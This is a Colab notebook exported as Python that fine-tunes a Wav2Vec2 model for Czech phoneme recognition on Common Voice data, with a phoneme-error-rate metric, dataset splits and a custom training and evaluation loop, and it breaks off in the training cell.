from transformers import trainer_pt_utils
from transformers.trainer_pt_utils import DistributedTensorGatherer
from transformers.trainer_utils import EvalPrediction, denumpify_detensorize, PredictionOutput
from torch.utils.data.dataloader import DataLoader
from torch.optim.lr_scheduler import ReduceLROnPlateau
import random
import math
import pandas as pd
import numpy as np
from IPython.display import display, HTML
import re
import json
import os
from tqdm.notebook import tqdm
# phonemizer
#from phonemizer import phonemize
# + [markdown] id="5ipHCrkV2LHc"
# # Utils
# + id="gMRMKmC02Kib" executionInfo={"status": "ok", "timestamp": 1616608750468, "user_tz": -60, "elapsed": 5153, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "02556879631367095259"}}
# text to phoneme
def text2phoneme(batch):
batch["sentence"] = phonemize(batch["sentence"], language='cs', backend="espeak")
return batch
# Visualisation
def show_random_elements(dataset, num_examples=10):
assert num_examples <= len(dataset), "Can't pick more elements than there are in the dataset."
picks = []
for _ in range(num_examples):
pick = random.randint(0, len(dataset)-1)
while pick in picks:
pick = random.randint(0, len(dataset)-1)
picks.append(pick)
df = pd.DataFrame(dataset[picks])
display(HTML(df.to_html()))
# Metrics PER
def NeedlemanWunschAlignScore(seq1, seq2, d, m, r, normalize=True):
N1, N2 = len(seq1), len(seq2)
# Fill up the errors
tmpRes_ = [[None for x in range(N2 + 1)] for y in range(N1 + 1)]
for i in range(N1 + 1):
tmpRes_[i][0] = i * d
for j in range(N2 + 1):
tmpRes_[0][j] = j * d
for i in range(N1):
for j in range(N2):
match = r if seq1[i] == seq2[j] else m
v1 = tmpRes_[i][j] + match
v2 = tmpRes_[i + 1][j] + d
v3 = tmpRes_[i][j + 1] + d
tmpRes_[i + 1][j + 1] = max(v1, max(v2, v3))
i = j = 0
res = -tmpRes_[N1][N2]
if normalize:
res /= float(N1)
return res
def get_seq_PER(seqLabels, detectedLabels):
return NeedlemanWunschAlignScore(seqLabels, detectedLabels, -1, -1, 0,
normalize=True)
def generate_per_score(refs, hyps):
score = 0.0
for ref, hyp in zip(refs, hyps):
score += get_seq_PER(ref.replace('[UNK]', ''), hyp.replace('[UNK]', ''))
return score/len(refs)
# Preprocessing
chars_to_ignore_regex = '[\,\?\.\!\-\;\:\"\“\%\‘\”\�\—\…\–\«\»]'
def remove_special_characters(batch):
batch["text"] = re.sub(chars_to_ignore_regex, '', batch["sentence"]).lower() + " "
batch["text"] = batch["text"].replace('`', '’')
return batch
# Vocabulary
def extract_all_chars(batch):
all_text = " ".join(batch["text"])
vocab = list(set(all_text))
return {"vocab": [vocab], "all_text": [all_text]}
# Audio file
def speech_file_to_array_fn(batch):
speech_array, sampling_rate = torchaudio.load(batch["path"])
batch["speech"] = speech_array[0].numpy()
batch["sampling_rate"] = sampling_rate
batch["target_text"] = batch["text"]
return batch
def resample(batch):
batch["speech"] = librosa.resample(np.asarray(batch["speech"]), 48_000, 16_000)
batch["sampling_rate"] = 16_000
return batch
# Preparing dataset for training
def prepare_dataset(batch):
# check that all files have the correct sampling rate
assert (
len(set(batch["sampling_rate"])) == 1
), f"Make sure all inputs have the same sampling rate of {processor.feature_extractor.sampling_rate}."
batch["input_values"] = processor(batch["speech"], sampling_rate=batch["sampling_rate"][0]).input_values
with processor.as_target_processor():
batch["labels"] = processor(batch["target_text"]).input_ids
return batch
# Special Data Collator
@dataclass
class DataCollatorCTCWithPadding:
"""
Data collator that will dynamically pad the inputs received.
Args:
processor (:class:`~transformers.Wav2Vec2Processor`)
The processor used for proccessing the data.
padding (:obj:`bool`, :obj:`str` or :class:`~transformers.tokenization_utils_base.PaddingStrategy`, `optional`, defaults to :obj:`True`):
Select a strategy to pad the returned sequences (according to the model's padding side and padding index)
among:
* :obj:`True` or :obj:`'longest'`: Pad to the longest sequence in the batch (or no padding if only a single
sequence if provided).
* :obj:`'max_length'`: Pad to a maximum length specified with the argument :obj:`max_length` or to the
maximum acceptable input length for the model if that argument is not provided.
* :obj:`False` or :obj:`'do_not_pad'` (default): No padding (i.e., can output a batch with sequences of
different lengths).
max_length (:obj:`int`, `optional`):
Maximum length of the ``input_values`` of the returned list and optionally padding length (see above).
max_length_labels (:obj:`int`, `optional`):
Maximum length of the ``labels`` returned list and optionally padding length (see above).
pad_to_multiple_of (:obj:`int`, `optional`):
If set will pad the sequence to a multiple of the provided value.
This is especially useful to enable the use of Tensor Cores on NVIDIA hardware with compute capability >=
7.5 (Volta).
"""
processor: Wav2Vec2Processor
padding: Union[bool, str] = True
max_length: Optional[int] = None
max_length_labels: Optional[int] = None
pad_to_multiple_of: Optional[int] = None
pad_to_multiple_of_labels: Optional[int] = None
def __call__(self, features: List[Dict[str, Union[List[int], torch.Tensor]]]) -> Dict[str, torch.Tensor]:
# split inputs and labels since they have to be of different lenghts and need
# different padding methods
input_features = [{"input_values": feature["input_values"]} for feature in features]
label_features = [{"input_ids": feature["labels"]} for feature in features]
batch = self.processor.pad(
input_features,
padding=self.padding,
max_length=self.max_length,
pad_to_multiple_of=self.pad_to_multiple_of,
return_tensors="pt",
)
with self.processor.as_target_processor():
labels_batch = self.processor.pad(
label_features,
padding=self.padding,
max_length=self.max_length_labels,
pad_to_multiple_of=self.pad_to_multiple_of_labels,
return_tensors="pt",
)
# replace padding with -100 to ignore loss correctly
labels = labels_batch["input_ids"].masked_fill(labels_batch.attention_mask.ne(1), -100)
batch["labels"] = labels
return batch
# Metric
def compute_metrics(pred):
pred_logits = pred.predictions
pred_ids = np.argmax(pred_logits, axis=-1)
pred.label_ids[pred.label_ids == -100] = processor.tokenizer.pad_token_id
pred_str = processor.batch_decode(pred_ids)
# we do not want to group tokens when computing the metrics
label_str = processor.batch_decode(pred.label_ids, group_tokens=False)
wer = wer_metric.compute(predictions=pred_str, references=label_str)
return {"wer": wer}
# Input preparation
def prepare_inputs(inputs):
for k, v in inputs.items():
if isinstance(v, torch.Tensor):
inputs[k] = v.cuda()
return inputs
# Loss computation
def compute_loss(model, inputs, return_outputs=False):
outputs = model(**inputs)
loss = outputs["loss"] if isinstance(outputs, dict) else outputs[0]
return (loss, outputs) if return_outputs else loss
# Prediction Loop
def prediction_loop(data_loader, model, world_size):
num_examples = len(data_loader.dataset)
batch_size = data_loader.batch_size
eval_losses_gatherer = DistributedTensorGatherer(world_size, num_examples,
make_multiple_of=batch_size)
preds_gatherer = DistributedTensorGatherer(world_size, num_examples)
labels_gatherer = DistributedTensorGatherer(world_size, num_examples)
losses_host, preds_host, labels_host = None, None, None
model.eval()
for step, inputs in enumerate(data_loader):
loss, logits, labels = prediction_step(model, inputs)
losses = loss.repeat(batch_size)
losses_host = losses if losses_host is None else torch.cat((losses_host, losses), dim=0)
preds_host = logits if preds_host is None else nested_concat(preds_host, logits, padding_index=-100)
labels_host = labels if labels_host is None else nested_concat(labels_host, labels, padding_index=-100)
eval_losses_gatherer.add_arrays(trainer_pt_utils.nested_numpify(losses_host))
preds_gatherer.add_arrays(trainer_pt_utils.nested_numpify(preds_host))
labels_gatherer.add_arrays(trainer_pt_utils.nested_numpify(labels_host))
losses_host, preds_host, labels_host = None, None, None
eval_loss = eval_losses_gatherer.finalize()
preds = preds_gatherer.finalize()
labels_ids = labels_gatherer.finalize()
preds_ids = np.argmax(preds, axis=-1)
predicted_phonemes = processor.batch_decode(torch.from_numpy(preds_ids))
true_phonemes = processor.batch_decode(torch.from_numpy(labels_ids))
return generate_per_score(true_phonemes, predicted_phonemes)
# Prediction Single Batch
def prediction_step(model, inputs, label_names=["labels"]):
has_labels = all(inputs.get(k) is not None for k in label_names)
inputs = prepare_inputs(inputs)
if hasattr(model, "config"):
ignore_keys = getattr(model.config, "keys_to_ignore_at_inference", [])
else:
ignore_keys = []
if has_labels:
labels = trainer_pt_utils.nested_detach(tuple(inputs.get(name) for name in label_names))
if len(labels) == 1:
labels = labels[0]
else:
labels = None
with torch.no_grad():
if has_labels:
loss, outputs = compute_loss(model, inputs, True)
loss = loss.mean().detach()
if isinstance(outputs, dict):
logits = tuple(v for k, v in outputs.items() if k not in ignore_keys + ["loss"])
else:
logits = outputs[1:]
else:
loss, outputs = None, model(**inputs)
if isinstance(outputs, dict):
logits = tuple(v for k, v in outputs.items() if k not in ignore_keys + ["loss"])
else:
logits = outputs
logits = trainer_pt_utils.nested_detach(logits)
if len(logits) == 1:
logits = logits[0]
return (loss, logits, labels)
# + [markdown] id="ami3ewqkUaD_"
# # Czech Dataset
# IF YOU DON'T HAVE ALREADY THE DATASET PREPROCESSED CONTINUE, OTHERWISE SKIP THIS SECTION
# + [markdown] id="prxikwRLNuGb"
# We are going to download the ukrainian dataset \
# **Note**: Most likely, the common voice link has expired. In this case, just go to [Common Voice's dataset website](https://commonvoice.mozilla.org/en/datasets), select your language, *e.g.* `Ukrainian`, enter your email address to get the "*Download*" button, click right, and click `Copy link address` to fill it in the cell below.
# + colab={"base_uri": "https://localhost:8080/"} id="ILk9Yhi0OgvS" executionInfo={"elapsed": 2239, "status": "ok", "timestamp": 1616490079984, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "02556879631367095259"}, "user_tz": -60} outputId="977b6bf2-dc07-4d1d-bd6d-f2debc8ae3af"
common_voice = load_dataset("common_voice", "cs", data_dir="./cv-corpus-6.1-2020-12-11", split="train+validation")
common_voice_test = load_dataset("common_voice", "cs", data_dir="./cv-corpus-6.1-2020-12-11", split="test")
# + id="SZJPv7tBPBTo"
common_voice = common_voice.remove_columns(["accent", "age", "client_id", "down_votes", "gender", "locale", "segment", "up_votes"])
common_voice_test = common_voice_test.remove_columns(["accent", "age", "client_id", "down_votes", "gender", "locale", "segment", "up_votes"])
# + [markdown] id="GHIkAICG14lg"
# ## Preprocess
# + colab={"base_uri": "https://localhost:8080/", "height": 979} id="qnYPgxtU14GO" executionInfo={"elapsed": 576, "status": "ok", "timestamp": 1616489134922, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "02556879631367095259"}, "user_tz": -60} outputId="3219b3ab-1002-4fe9-c596-709f1d1c26ca"
show_random_elements(common_voice.remove_columns(['path']), num_examples=30)
# + [markdown] id="VFj3gHW33RGD"
# We are going to preprocess the text and remove some special symbol `,.?!;` as we don't have any language model at the output
# + colab={"base_uri": "https://localhost:8080/", "height": 443, "referenced_widgets": ["5fa116cd7f264eec855efa3b22c20635", "98b11a23cb0c40c78443d0199a5a0082", "3058c42a1f3f4dea9070db436ce6667b", "ebb3d45d0d234e5bbb10d47490894569", "bde84daa66064780b13b8928331778cf", "370932d8f7a940dcb3f33a9157f512c0", "34d87e13dea74042988464d7fabea33c", "<KEY>", "<KEY>", "<KEY>", "<KEY>", "<KEY>", "<KEY>", "4e488f05650b4227bd46f301610be2ab", "bad4e8b63e6c40e483f825a803972f83", "bd0e440382e3485d887997c97ef0aea7", "d2a34d88cf6a42e9a587181d077e6594", "e77fd3b8557e40a69e1fae099be4096d", "<KEY>", "<KEY>", "4a00f1d9ccea43dda078a04d8ab8a3ec", "538ed3e8a1dd4bd388d899f348124549", "ff51cc380d1842dfb04dc3038fd972a8", "e2bc7417023b40a580b6774ad142f15d", "c0d1e45c9942403886a8da22e1797b37", "<KEY>", "24d1f9bdf3614b93903ace903e79417b", "<KEY>", "44a663ce845a4649a223b37509a2a266", "26a01e2c91754a359b1e2fb226dec9f6", "b84b2dabe3b84653a2176413b34b4a83", "c53523b99ef941f99b3be8d5b2da795c", "<KEY>", "<KEY>", "fe5487e30fa34778bc27a1c28c659ad1", "4bac4de23e9849dcb55ab7a7566cc81b", "<KEY>", "<KEY>", "<KEY>", "a17d4ef15c874f0393b579e2fb9e8ce6", "b8cddfd361cc488a897783c79ef04188", "1b7b9a3a31c045e99ad64289e4639606", "<KEY>", "<KEY>", "be04673025df462fb9f5a16957576871", "<KEY>", "<KEY>", "ff17a11b82e44d3386cc1ed4161285db", "<KEY>", "<KEY>", "<KEY>", "bad297b846a44541a6fb2a871011e7b9", "<KEY>", "<KEY>", "<KEY>", "d1757d64678b42789581aea86afad429", "de0e6d03e8954117812a655aeabeb5bd", "ff5562ef17d94ed48cd28652efc2368c", "14b494ae1cb849ebaed43fcaf6579e9d", "<KEY>", "daf002ce8894498dbc6d5b78da8b94b7", "64e4a851f13f44f08be3fd3dd8d0f753", "<KEY>", "9991ca01a90c4324a5cc9c434f048862"]} id="tUFCciNKR8YG" executionInfo={"elapsed": 507217, "status": "ok", "timestamp": 1616490586031, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "02556879631367095259"}, "user_tz": -60} outputId="7741a7ea-0c6d-4c80-a675-e7e4c6c88b79"
common_voice = common_voice.map(text2phoneme, num_proc=4)
common_voice_test = common_voice_test.map(text2phoneme, num_proc=4)
# + colab={"base_uri": "https://localhost:8080/", "height": 979} id="UrjmzIbZSdO-" executionInfo={"elapsed": 551, "status": "ok", "timestamp": 1616489685993, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "02556879631367095259"}, "user_tz": -60} outputId="1a14f205-cb68-40d2-c1b3-46a3c4941272"
show_random_elements(common_voice.remove_columns(['path']), num_examples=30)
# + id="qavL52PA4Y21"
# common_voice = common_voice.map(remove_special_characters, remove_columns=["sentence"])
# common_voice_test = common_voice_test.map(remove_special_characters, remove_columns=["sentence"])
# + [markdown] id="fNUbpCJV4zkf"
# Let's now how the sentence looks like
# + id="nq-lzngY421w"
# show_random_elements(common_voice.remove_columns(["path"]))
# + [markdown] id="5mxfaO3p4_mp"
# ## Building Vocabulary
# + [markdown] id="d7GXUJ3S5BUT"
# As we are going to use a CTC (as top layer), we are going to classify speech chunks into letters, so now we will extract all distinct letters and build our vocabulary from that.
# + id="R7gawagYWQF_"
common_voice = common_voice.rename_column("sentence", "text")
common_voice_test = common_voice_test.rename_column("sentence", "text")
# + colab={"base_uri": "https://localhost:8080/", "height": 115, "referenced_widgets": ["bdc889b016ab4d7aa33d582856641367", "08218a8a8a2948cc80e27a09dcf37086", "db14bbc67cfd474a87ee61615353924e", "8583d6d2e73d433489ddc67b31ece9ee", "b7814c84cee9465a9953bc63a94fa759", "156bb357c9e34c84ae0aabefcf256514", "<KEY>", "<KEY>", "464b303ce4f044869f75ab5363e37f5b", "<KEY>", "55fc25e2f4da437e81f73b1041710248", "8470bd2a597e49719c406e574842516f", "6b13ff53e4e94bc0989e6ff41ba065ab", "89139d52e18d4b7ab5cab8282f11e7f2", "<KEY>", "<KEY>"]} id="2kgxTh1U5VNL" executionInfo={"elapsed": 927, "status": "ok", "timestamp": 1616490586995, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "02556879631367095259"}, "user_tz": -60} outputId="27cac918-713c-4d7e-af6a-b0a886d1e07c"
vocab_train = common_voice.map(extract_all_chars, batched=True, batch_size=-1, keep_in_memory=True, remove_columns=common_voice.column_names)
vocab_test = common_voice_test.map(extract_all_chars, batched=True, batch_size=-1, keep_in_memory=True, remove_columns=common_voice_test.column_names)
# + [markdown] id="5YNn85Yi5i1r"
# Now we will create the union of all distinct letters from both dataset. We will do the same thing as when we are dealing with translation / generation task.
# + colab={"base_uri": "https://localhost:8080/"} id="Z2CwjQQv5uho" executionInfo={"elapsed": 919, "status": "ok", "timestamp": 1616490586996, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "02556879631367095259"}, "user_tz": -60} outputId="707db7d4-5731-4d8e-fde1-9139c891da83"
vocab_list = list(set(vocab_train["vocab"][0]) | set(vocab_test["vocab"][0]))
vocab_dict = {v: k for k, v in enumerate(vocab_list)}
vocab_dict
# + colab={"base_uri": "https://localhost:8080/"} id="0FdMWUD4HOvy" executionInfo={"elapsed": 911, "status": "ok", "timestamp": 1616490586996, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "02556879631367095259"}, "user_tz": -60} outputId="2f897b96-3240-4175-990b-09e5fb96c8dd"
# Adding the blank token, the unknown token and the padding token
vocab_dict["|"] = vocab_dict[" "]
del vocab_dict[" "]
vocab_dict["[UNK]"] = len(vocab_dict)
vocab_dict["[PAD]"] = len(vocab_dict)
print(f"Our final layer will have as output dimension {len(vocab_dict)}")
# + id="8Z0wt0YQHnDC"
# Now let's save our dictionary
parent_dir = ['/content/drive/MyDrive/speech_w2v', '/content/drive/MyDrive/3A/MVA/Speech & NLP/speech_w2v']
i = 0
with open(os.path.join(parent_dir[i], 'czeck_phonem_vocab.json'), 'w') as vocab_file:
json.dump(vocab_dict, vocab_file)
# + [markdown] id="pXTLSrSXI5oH"
# ## XLSR Wav2Vec 2.0 Features Extractor
# + colab={"base_uri": "https://localhost:8080/", "height": 115, "referenced_widgets": ["b830e68b5d8c4ceeb5241e293d1aaf3e", "a37142e2b45f4add95e9645c1642a826", "d9eab2af371341d4b9ce757dc6e11f66", "776b82f4ea4a4bc091c98139f4f1695e", "<KEY>", "<KEY>", "3c5a4f40b4a946b9b045f9f20bc8e509", "<KEY>", "<KEY>", "20d6551c5f814a429434f517eff06698", "<KEY>", "25665e0f26114eb29e85f9021e94edf8", "<KEY>", "<KEY>", "209c5a5901af4044a11ebff8395a8205", "de65838015034b2b822bf66ea7906815"]} id="PDvLUjQ6JoMw" executionInfo={"elapsed": 408658, "status": "ok", "timestamp": 1616490994759, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "02556879631367095259"}, "user_tz": -60} outputId="8ea21f32-777a-4658-a7b0-91dab4fb7cbd"
# Now we are going to open and store the audio file (represented as a numpy array)
common_voice = common_voice.map(speech_file_to_array_fn, remove_columns=common_voice.column_names)
common_voice_test = common_voice_test.map(speech_file_to_array_fn, remove_columns=common_voice_test.column_names)
# + colab={"base_uri": "https://localhost:8080/", "height": 443, "referenced_widgets": ["c48564c22a9d47dbbf1680472bcc468a", "82f28d1689de492f9dce17bc7c683c13", "5f26aedf9248442293008f4f9b642ae5", "49cdf3f337284d71bb7488e251586f5f", "3149f05e693e4d73b7243519dcf481f3", "<KEY>", "<KEY>", "92f287e0d59b497b83e30185e606e7f0", "42c33bf0ac784e4d9537d1570ab40327", "<KEY>", "fa116538f536457b9ac238f5fc8cbe7b", "<KEY>", "2bd858659cd9400e8e405cd536fee5ed", "<KEY>", "a67d017df9b24fdb95fc53abe26ce94d", "<KEY>", "38d1e7fa6d4a47b1a458a089b3a9d64f", "<KEY>", "eb46a8777268403dba3a634ce01c8d3c", "2f8037a0f44a48e0ae718d436a771e22", "8be5205d00bf4eedb66ef923b8549544", "<KEY>", "15339b560e7846f5bbb775a15f205c80", "<KEY>", "<KEY>", "<KEY>", "<KEY>", "<KEY>", "4653fef7450b4b3a87193f637a4b803a", "<KEY>", "d9ac2dd6bd0f47f38d2406dd4558e5c0", "f0ca7f1024944ababd270734cfc1c21a", "7b8ca9f07bbc40c1a5313b98eac7ccf7", "<KEY>", "e610a2f6f4f74eeca4ff915430ba5715", "efeb7d304ea843099791d5dbef75a028", "<KEY>", "f1fe5e8f4a644a5e99afc2c308a48e05", "<KEY>", "<KEY>", "c2415157b2e243a095812c62626934a4", "<KEY>", "a3d0047269be4fe3a98280cafa3062e7", "250cbee5ee364feda6bd52eeefc9aa33", "230dc78443f5425da77ee33c953ab46a", "9984b8aa8e8d41e890042e94dff84907", "919ad69d55884ae280a7b13f6e809538", "<KEY>", "<KEY>", "<KEY>", "<KEY>", "7455f4f71e7a430cac5a6ce84d76f83e", "<KEY>", "<KEY>", "<KEY>", "<KEY>", "f1114a754a834f7eb280a37c6e0e1ba7", "<KEY>", "<KEY>", "fa8caf7043ab40bc9838ed9189cc3dcb", "<KEY>", "f84ed7f7e81d43b18335553c5cf80a65", "<KEY>", "dafa43f3ef184372abe4867e37c1281a"]} id="QeJR0xmGI_uo" executionInfo={"elapsed": 2117561, "status": "ok", "timestamp": 1616492703670, "user": {"displayName": "Omar US", "photoUrl": "", "userId": "02556879631367095259"}, "user_tz": -60} outputId="35e12dc8-7fc5-463b-b736-e3e534f849fe"
# First we have to downsampled the original sample from 48 kHZ to 16kHZ
common_voice = common_voice.map(resample, num_proc=4)
common_voice_test = common_voice_test.map(resample, num_proc=4)
# + id="xFnGfLnrQDyN"
# common_voice.save_to_disk('/content/drive/MyDrive/speech_w2v/train_ukrainian_preprocessed.files')
# common_voice_test.save_to_disk('/content/drive/MyDrive/speech_w2v/test_ukrainian_preprocessed.files')
# + [markdown] id="JjTetH_U6xqm"
# # Load locally if already saved the preprocess file
# + [markdown] id="6sYvc6m7gnrr"
# # Split in 10mn, 1h, 8h
# + id="qTNcGxVQ5gEz"
# Loading tokenizer
tokenizer = Wav2Vec2CTCTokenizer(os.path.join(parent_dir[i], 'czeck_phonem_vocab.json'), unk_token="[UNK]", pad_token="[PAD]", word_delimiter_token="|")
# Load Feature Extractor
feature_extractor = Wav2Vec2FeatureExtractor(feature_size=1, sampling_rate=16000, padding_value=0.0, do_normalize=True, return_attention_mask=True)
# Wrap the feature_extractor and the tokenizer into one class (thanks so much HuggingFace)
processor = Wav2Vec2Processor(feature_extractor=feature_extractor, tokenizer=tokenizer)
# + id="KhqVRMLQFPTl"
# Split into train/dev
np.random.seed(42)
data = common_voice.train_test_split(test_size=0.2, seed=42)
common_voice_train, common_voice_validation = data['train'], data['test']
# + id="fcExOxBNf1PB"
# Now let's shuffle data
common_voice_train = common_voice_train.shuffle(seed=42)
# + colab={"base_uri": "https://localhost:8080/", "height": 66, "referenced_widgets": ["6a865b18b5f24222ab175d17ea30cb89", "<KEY>", "<KEY>", "39f1354be8f74417bc2a18570921ab20", "850ee67edfaa4ff983a7d81718219fff", "3210aed1125d4feb846f88c6021ff3ce", "<KEY>", "112822ddb9c642e89c97ec5db757463c"]} id="gAXOZJNKedmh" executionInfo={"elapsed": 498869, "status": "ok", "timestamp": 1616493202571, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "02556879631367095259"}, "user_tz": -60} outputId="cb36fc7a-7f17-43ca-9941-dd6398ca34ac"
total_len_seconds = 0
indices_10mn = []
indices_1h = []
indices_8h = []
for i in tqdm(range(len(common_voice_train))):
speech_array, sampling_rate = common_voice_train[i]["speech"], common_voice_train[i]["sampling_rate"]
duration_audio = len(speech_array) * (1/sampling_rate)
if total_len_seconds <= 600:
indices_10mn.append(i)
if total_len_seconds <= 3600:
indices_1h.append(i)
if total_len_seconds <= 36000:
indices_8h.append(i)
total_len_seconds += duration_audio
if total_len_seconds > 36000:
break
# + id="p8HbeUcrk9Ih"
common_voice_train_10mn = common_voice_train.select(indices_10mn)
common_voice_train_1h = common_voice_train.select(indices_1h)
common_voice_train_9h = common_voice_train.select(indices_8h)
# + id="r_s1mKyrRkFd"
common_voice_train_10mn = common_voice_train_10mn.map(prepare_dataset, remove_columns=common_voice_train_10mn.column_names, batch_size=8, num_proc=4, batched=True)
common_voice_train_1h = common_voice_train_1h.map(prepare_dataset, remove_columns=common_voice_train_1h.column_names, batch_size=8, num_proc=4, batched=True)
common_voice_train_9h = common_voice_train_9h.map(prepare_dataset, remove_columns=common_voice_train_9h.column_names, batch_size=8, num_proc=4, batched=True)
common_voice_validation = common_voice_validation.map(prepare_dataset, remove_columns=common_voice_validation.column_names, batch_size=8, num_proc=4, batched=True)
common_voice_test = common_voice_test.map(prepare_dataset, remove_columns=common_voice_test.column_names, batch_size=8, num_proc=4, batched=True)
# + id="EThqyYL-6sZu"
common_voice_train_10mn.save_to_disk('/content/drive/MyDrive/speech_w2v/train_czeck_phonem_10mn.files')
common_voice_train_1h.save_to_disk('/content/drive/MyDrive/speech_w2v/train_czeck_phonem_1h.files')
common_voice_train_9h.save_to_disk('/content/drive/MyDrive/speech_w2v/train_czeck_phonem_9h.files')
common_voice_validation.save_to_disk('/content/drive/MyDrive/speech_w2v/validation_czeck_phonem.files')
common_voice_test.save_to_disk('/content/drive/MyDrive/speech_w2v/test_czeck_phonem.files')
# + [markdown] id="FYc-hol0RiDk"
# # Training
# + id="bLZPYC1O7Ooo" executionInfo={"status": "ok", "timestamp": 1616608808425, "user_tz": -60, "elapsed": 59097, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "02556879631367095259"}}
#common_voice_train_10mn = load_from_disk('/content/drive/MyDrive/speech_w2v/train_czeck_phonem_10mn.files')
common_voice_train_1h = load_from_disk('/content/drive/MyDrive/speech_w2v/train_czeck_phonem_1h.files')
#common_voice_train_9h = load_from_disk('/content/drive/MyDrive/speech_w2v/train_czeck_phonem_9h.files')
common_voice_validation = load_from_disk('/content/drive/MyDrive/speech_w2v/validation_czeck_phonem.files')
common_voice_test = load_from_disk('/content/drive/MyDrive/speech_w2v/test_czeck_phonem.files')
# + id="YcU0OqWiCITf" executionInfo={"status": "ok", "timestamp": 1616608808427, "user_tz": -60, "elapsed": 58176, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "02556879631367095259"}}
parent_dir = ['/content/drive/MyDrive/speech_w2v', '/content/drive/MyDrive/3A/MVA/Speech & NLP/speech_w2v']
i = 0
# Loading tokenizer
tokenizer = Wav2Vec2CTCTokenizer(os.path.join(parent_dir[i], 'czeck_phonem_vocab.json'), unk_token="[UNK]", pad_token="[PAD]", word_delimiter_token="|")
# Load Feature Extractor
feature_extractor = Wav2Vec2FeatureExtractor(feature_size=1, sampling_rate=16000, padding_value=0.0, do_normalize=True, return_attention_mask=True)
# Wrap the feature_extractor and the tokenizer into one class (thanks so much HuggingFace)
processor = Wav2Vec2Processor(feature_extractor=feature_extractor, tokenizer=tokenizer)
# + id="bePRrNGpbxVs" colab={"base_uri": "https://localhost:8080/", "height": 66, "referenced_widgets": ["31d728f30aca4394be54a59232dd0f38", "1a7c9341837046d0ba8b08d5989046c6", "8f2d2f2cc7234a8d807c8534d98fabee", "5442cdcd2c0249c98f2fdf8c9f9c455d", "bb87805e219b445fb9a1c503008d219d", "8d9ed6bf62d54c2fa5ad2ce1ece5e75d", "1829d1d0be69450ea90dfeb6d7e39d88", "6f39d214b6464b30bd804278a7c23739"]} executionInfo={"status": "ok", "timestamp": 1616608809485, "user_tz": -60, "elapsed": 58129, "user": {"displayName": "Omar US", "photoUrl": "", "userId": "02556879631367095259"}} outputId="f444f9a0-80c9-4e83-a07f-137f371af497"
# Prepare our data collator
data_collator = DataCollatorCTCWithPadding(processor=processor, padding=True)
# Prepare our metric (wer_metric)
wer_metric = load_metric("wer")
# + [markdown] id="Diou-GNIbsJp"
# # 1h
# + [markdown] id="ADs7vPCeV84t"
# The first component of XLSR-Wav2Vec2 consists of a stack of CNN layers that are used to extract acoustically meaningful - but contextually independent - features from the raw speech signal. This part of the model has already been sufficiently trained during pretraining and as stated in the [paper](https://arxiv.org/pdf/2006.13979.pdf) does not need to be fine-tuned anymore.
# Thus, we can set the `requires_grad` to `False` for all parameters of the *feature extraction* part.
# + [markdown] id="Lhsh0PiCr8aH"
# Therefore, I had to play around a bit with different values for dropout, SpecAugment's masking dropout rate, layer dropout, and the learning rate until training seemed to be stable enough.
# + colab={"base_uri": "https://localhost:8080/", "height": 1000, "referenced_widgets": ["0c4a5ddad2ca47fa96c630e9b7db909e", "4c3dd25966ac4bda9ab8cf8a2245fd64", "251dea592ddd4d498be0adddd479c3f9", "fd75aadebbec487a8e86fd0bcde3d8a9", "<KEY>", "7401aed895084085a00ed8908d421a4c", "a7fde143a991448e87ac4a34f0db619a", "3d30a590387f4ee9988c747a257cc0af", "<KEY>", "ea53de9fc5124e74a3ceff91f6472265", "2ae034f212874a4797c3cde23a412868", "<KEY>", "3234115ea2a64cbe85689ec2512203ce", "<KEY>", "780d6563f97345cca117d4add7c0df6d", "122381153629442ea980e8114b7d2c35"]} id="98jur6H-exB1" executionInfo={"status": "error", "timestamp": 1616621405417, "user_tz": -60, "elapsed": 12508750, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "02556879631367095259"}} outputId="64750d07-a0ca-4be3-e85f-d1bf5ad5e7b0"
# Cell for training
# Set seed
set_seed(42)
# fname = '/content/wav2vec_small_960h.pt'
# checkpoint = torch.load(fname)
# args = checkpoint["args"]
# Load model
model = Wav2Vec2ForCTC.from_pretrained(
"facebook/wav2vec2-large-lv60",
# "facebook/wav2vec2-base-960h",
attention_dropout=0.1,
hidden_dropout=0.1,
feat_proj_dropout=0.0,
mask_time_prob=0.05,
layerdrop=0.1,
gradient_checkpointing=True,
ctc_loss_reduction="mean",
pad_token_id=processor.tokenizer.pad_token_id,
vocab_size=len(processor.tokenizer)
)
# Freeze the feature extractor
model.freeze_feature_extractor()
#for param in model.wav2vec2.feature_projection.parameters():
#param.requires_grad = False
#for param in model.wav2vec2.encoder.parameters():
#param.requires_grad = False
# Set to GPU
model.cuda()
# Get sampler
model_input_name = processor.feature_extractor.model_input_names[0]
sampler_train = trainer_pt_utils.LengthGroupedSampler(common_voice_train_1h, batch_size=16, model_input_name=model_input_name)
sampler_val = trainer_pt_utils.LengthGroupedSampler(common_voice_validation, batch_size=12, model_input_name=model_input_name)
# Get Loader
train_loader = DataLoader(common_voice_train_1h, batch_size=16, sampler=sampler_train, collate_fn=data_collator, num_workers=4)
valid_loader = DataLoader(common_voice_validation, batch_size=12, sampler=sampler_val, collate_fn=data_collator, num_workers=4)
#
learning_rate = 4e-4
n_epochs = 300
num_update_steps_per_epoch = len(train_loader)
max_steps = math.ceil(n_epochs * num_update_steps_per_epoch)
validation_freq = int(1*num_update_steps_per_epoch)
print_freq = int(1*num_update_steps_per_epoch)
scheduler_on_plateau_freq = int(num_update_steps_per_epoch)
# Optimizer
decay_parameters = trainer_pt_utils.get_parameter_names(model, [torch.nn.LayerNorm])
decay_parameters = [name for name in decay_parameters if "bias" not in name]
optimizer_grouped_parameters = [
{
"params": [p for n, p in model.named_parameters() if n in decay_parameters],
"weight_decay": 0.0,
},
{
"params": [p for n, p in model.named_parameters() if n not in decay_parameters],
"weight_decay": 0.0,
},
]
optimizer = AdamW(optimizer_grouped_parameters, lr=learning_rate)
# Scheduler
